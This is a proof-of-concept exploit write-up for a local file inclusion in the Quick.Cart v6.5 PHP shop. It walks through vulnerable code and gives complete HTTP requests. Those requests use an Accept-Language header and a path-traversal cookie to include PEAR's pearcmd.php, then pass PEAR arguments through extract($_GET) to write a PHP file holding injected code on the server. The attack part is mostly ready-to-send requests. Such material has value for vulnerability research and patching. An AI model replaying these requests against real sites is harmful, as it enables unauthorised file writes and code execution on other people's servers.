POC - Quick.Cart v6.5 - Local File Inclusion

[LFI] Quick.Cart v6.5

admin.php::
... SNIP ...
extract( $_GET );
define( 'ADMIN_PAGE', true );
... SNIP ...

Funny, passing user input directly to extract x) --- We will need this later...

admin.php::
... SNIP ...
require 'database/config/general.php';
... SNIP ...

Lets digg here :p

database/config/general.php::
... SNIP ...
$config['change_language_to_polish'] = true;
if( !defined( 'CUSTOMER_PAGE' ) && 
    !empty( $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) && 
 $config['change_language_to_polish'] === true && 
 preg_match( '/pl-|pl,|^pl$/', $_SERVER['HTTP_ACCEPT_LANGUAGE'] ) ) {
... SNIP ...
  if( isset( $_COOKIE['sAdminLanguage'] ) )
    $config['admin_lang']= $_COOKIE['sAdminLanguage'];
... SNIP ...
require_once defined( 'CUSTOMER_PAGE' ) ? $config['dir_lang'].LANGUAGE.'.php' : ( is_file( $config['dir_lang'].$config['admin_lang'].'.php' ) ? $config['dir_lang'].$config['admin_lang'].'.php' : $config['dir_lang'].LANGUAGE.'.php' );
... SNIP ...

1. in "admin.php" CUSTOMER_PAGE is not defined
2. we can set the header "Accept-Language: pl-PL,pl;"
3. we control the cookies too

Means! 
$config['admin_lang'] is controlled :D

So, we can include any file ends ".php"
The file address must be a real file (is_file) -_-"
Actually nothing good todo... 

maybe we can use PEAR sources :p

GET /qcv56/admin.php HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Language: pl-PL,pl;
Cookie: sAdminLanguage=../../../../../../../../usr/lib/php/pearcmd;

Well done ... lets use the "extract($_GET)" to pass arguments to PEAR
-s -c ./files/83f2a5ec3fca.php -d preferred_mirror="<?php phpinfo() ?>"
tricky :p ...

GET /qcv56/admin.php?argv[]=&argv[]=-s&argv[]=-c&argv[]=./files/83f2a5ec3fca.php&argv[]=-dpreferred_mirror=<?php%20phpinfo()%20?> HTTP/1.1
Host: 127.0.0.1
Connection: close
Accept-Language: pl-PL,pl;
Cookie: sAdminLanguage=../../../../../../../../usr/lib/php/pearcmd;

GET /qcv56/files/83f2a5ec3fca.php HTTP/1.1
Host: 127.0.0.1
Connection: close

file created :)